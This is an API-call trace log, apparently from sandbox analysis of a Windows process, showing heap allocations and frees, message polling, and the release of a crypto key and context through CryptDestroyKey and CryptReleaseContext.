RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0181.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0181.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0181.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0181.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0181.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0181.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0181.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.597] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0181.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.598] CryptDestroyKey (hKey=0xa87290) returned 1 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0181.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0181.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0181.599] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0181.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.600] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0181.600] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.600] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0181.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0181.600] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0181.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0181.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0181.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0181.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0181.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.601] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0181.601] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0181.601] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0181.601] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0181.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0181.602] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0181.602] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0181.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0181.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0181.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0181.603] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0181.603] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0181.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0181.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.603] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0181.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0181.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.604] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0181.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0181.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0181.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.604] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0181.604] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.604] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0181.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0181.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0181.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0181.605] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0181.605] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0181.606] 